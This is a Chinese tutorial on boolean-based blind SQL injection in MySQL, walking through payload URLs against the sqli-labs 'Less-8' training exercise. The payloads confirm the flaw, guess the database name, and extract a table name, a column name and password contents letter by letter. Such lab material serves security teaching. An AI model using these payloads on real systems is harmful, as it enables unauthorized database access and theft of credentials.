Mysql注入 -- 布尔注入

2021/5/15 2:26:00

本文主要是介绍Mysql注入 -- 布尔注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

千万不要在你还没辞职的时候,告诉你同事说要辞职了。。。

----  网易云热评   

一、常用函数

1、mid(str,1,5):取字符串str的前5个字节

2、ord():转换成ASCII码

3、length():统计长度

4、 ascii():将字符转换ASCII

二、实例演示

1、and 1=1

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=1 --+ 返回正确

2、and 1=2

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=2 --+ 返回错误

3、判断数据库长度

http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=8 --+返回正常,说明数据库长度为8http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=9 --+返回错误

4、判断数据库第一个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),1,1)='s' --+ 不停的修改二十六个字母,知道正确为之

5、判断数据库第二个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),2,1)='e' --+ 最终获取数据库的名称为“security”

6、获取表名,最终获取表名users

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u' --+

7、获取字段名,最终获取字段名password

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select column_name from information_schema.columns where table_name='users' limit 12,1),1,1)='p' --+

8、获取字段内容,最终获取一个名为admin的内容

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select password from users limit 8,1),1,1)='a' --+

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧



这篇关于Mysql注入 -- 布尔注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程